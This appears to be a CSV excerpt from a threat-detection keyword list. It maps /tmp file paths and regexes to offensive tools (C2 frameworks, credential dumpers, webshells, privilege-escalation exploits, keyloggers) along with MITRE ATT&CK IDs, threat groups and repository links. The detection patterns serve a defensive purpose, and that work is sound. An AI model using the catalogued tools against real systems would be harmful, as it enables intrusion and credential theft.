"*/tinar.py*",".{0,1000}\/tinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","#linux","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","11929"
"*/tinymet.exe*",".{0,1000}\/tinymet\.exe.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","1","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","11930"
"*/tls-alpn.nse*",".{0,1000}\/tls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11932"
"*/tls-nextprotoneg.nse*",".{0,1000}\/tls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11933"
"*/tls-ticketbleed.nse*",".{0,1000}\/tls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11934"
"*/tmmmp *",".{0,1000}\/tmmmp\s.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","#linux","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","11939"
"*/tmp/ sgn -i /tmp/*",".{0,1000}\/tmp\/\ssgn\s\-i\s\/tmp\/.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","11940"
"*/tmp/*-passwords.txt*",".{0,1000}\/tmp\/.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","#linux","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","11944"
"*/tmp/*-usernames.txt*",".{0,1000}\/tmp\/.{0,1000}\-usernames\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","#linux","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","11945"
"*/tmp/.llock*",".{0,1000}\/tmp\/\.llock.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","11946"
"*/tmp/.manspider*",".{0,1000}\/tmp\/\.manspider.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","11948"
"*/tmp/amass.zip*",".{0,1000}\/tmp\/amass\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11949"
"*/tmp/angel_bc *",".{0,1000}\/tmp\/angel_bc\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11950"
"*/tmp/auto-priv-cgroup*",".{0,1000}\/tmp\/auto\-priv\-cgroup.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","11951"
"*/tmp/auto-priv-mountdir*",".{0,1000}\/tmp\/auto\-priv\-mountdir.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","11952"
"*/tmp/auto-shimpwn*",".{0,1000}\/tmp\/auto\-shimpwn.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","11953"
"*/tmp/beacon_x64.bin*",".{0,1000}\/tmp\/beacon_x64\.bin.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#linux","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","11954"
"*/tmp/bin/csprecon*",".{0,1000}\/tmp\/bin\/csprecon.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11955"
"*/tmp/bin/subfinder*",".{0,1000}\/tmp\/bin\/subfinder.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11956"
"*/tmp/blackarch*",".{0,1000}\/tmp\/blackarch.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - path used by a script preparation of blackarch OS","T1204.002","TA0002","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","0","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","11957"
"*/tmp/borg_d3monized*",".{0,1000}\/tmp\/borg_d3monized.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","11958"
"*/tmp/c2-rebind.so*",".{0,1000}\/tmp\/c2\-rebind\.so.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","#linux","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","11960"
"*/tmp/chimera.ps1*",".{0,1000}\/tmp\/chimera\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","11961"
"*/tmp/credentials.txt*",".{0,1000}\/tmp\/credentials\.txt.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","11962"
"*/tmp/cryptomining*",".{0,1000}\/tmp\/cryptomining.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","0","#linux","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","11963"
"*/tmp/dcow *",".{0,1000}\/tmp\/dcow\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","#linux","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","11964"
"*/tmp/empire*",".{0,1000}\/tmp\/empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#linux","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11966"
"*/tmp/evil.sh*",".{0,1000}\/tmp\/evil\.sh.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","11967"
"*/tmp/exploit*",".{0,1000}\/tmp\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","11968"
"*/tmp/FavFreak/*",".{0,1000}\/tmp\/FavFreak\/.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11969"
"*/tmp/geckodriver.tar.gz*",".{0,1000}\/tmp\/geckodriver\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11972"
"*/tmp/gitleaks*",".{0,1000}\/tmp\/gitleaks.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11973"
"*/tmp/gtfokey.pub*",".{0,1000}\/tmp\/gtfokey\.pub.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11974"
"*/tmp/host.ghost*",".{0,1000}\/tmp\/host\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","11975"
"*/tmp/kerberos_tickets*",".{0,1000}\/tmp\/kerberos_tickets.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","11976"
"*/tmp/libpwn.c*",".{0,1000}\/tmp\/libpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11977"
"*/tmp/libpwn.so*",".{0,1000}\/tmp\/libpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11978"
"*/tmp/mac.ghost*",".{0,1000}\/tmp\/mac\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","11979"
"*/tmp/metadata/na.elf*",".{0,1000}\/tmp\/metadata\/na\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","11980"
"*/tmp/metasploit_install*",".{0,1000}\/tmp\/metasploit_install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","11981"
"*/tmp/p0f.log*",".{0,1000}\/tmp\/p0f\.log.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","#logfile #linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11982"
"*/tmp/passwd.bak*",".{0,1000}\/tmp\/passwd\.bak.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","11983"
"*/tmp/passwords.txt*",".{0,1000}\/tmp\/passwords\.txt.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","11984"
"*/tmp/payload.bin*",".{0,1000}\/tmp\/payload\.bin.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#linux","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","11985"
"*/tmp/payload.ps1*",".{0,1000}\/tmp\/payload\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","11986"
"*/tmp/payload.txt*",".{0,1000}\/tmp\/payload\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#linux","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","11987"
"*/tmp/Phishing/documentation.pdf.zip*",".{0,1000}\/tmp\/Phishing\/documentation\.pdf\.zip.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","11988"
"*/tmp/r00tshell*",".{0,1000}\/tmp\/r00tshell.{0,1000}","offensive_tool_keyword","exploit-db","privilege escalation exploit pattern on https://www.exploit-db.com/exploits/38576","T1068 - T1548 - T1055 - T1088 - T1134 - T1221 - T1543 - T1547 - T1574","TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://www.exploit-db.com/exploits/38576","1","0","#linux","linux privesc","10","10","N/A","N/A","N/A","N/A","11989"
"*/tmp/resolution.txt*server.sh*",".{0,1000}\/tmp\/resolution\.txt.{0,1000}server\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","11990"
"*/tmp/revshell.exe*",".{0,1000}\/tmp\/revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#linux","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","11991"
"*/tmp/scanrepo.tar.gz*",".{0,1000}\/tmp\/scanrepo\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11992"
"*/tmp/shellcode.bin*",".{0,1000}\/tmp\/shellcode\.bin.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#linux","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","11993"
"*/tmp/sish.log*",".{0,1000}\/tmp\/sish\.log.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11994"
"*/tmp/smb_auth_temp_*.txt*",".{0,1000}\/tmp\/smb_auth_temp_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","#linux","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11995"
"*/tmp/socks5.sh*",".{0,1000}\/tmp\/socks5\.sh.{0,1000}","offensive_tool_keyword","SystemBC","multifunctional malware mostly known as a socks proxy - used by varius ransomware groups with additional functionnalities","T1090 - T1095 - T1571 - T1071 - T1105 - T1021 - T1043","TA0011 - TA0010 - TA0002","N/A","N/A","Malware","https://github.com/Leeon123/Python3-botnet","1","0","#linux","N/A","10","1","36","25","2020-01-21T10:33:34Z","2019-01-15T14:02:21Z","11996"
"*/tmp/tmpfolder/pingoor.c*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","12000"
"*/tmp/tmpfolder/pingoor.h*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","12001"
"*/tmp/traitor.so*",".{0,1000}\/tmp\/traitor\.so.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12002"
"*/tmp/truffleHog.tar.gz*",".{0,1000}\/tmp\/truffleHog\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","12003"
"*/tmp/tshd*",".{0,1000}\/tmp\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","12004"
"*/tmp/vt-post-*.txt*",".{0,1000}\/tmp\/vt\-post\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","12005"
"*/tmp/vt-results-*.txt*",".{0,1000}\/tmp\/vt\-results\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","12006"
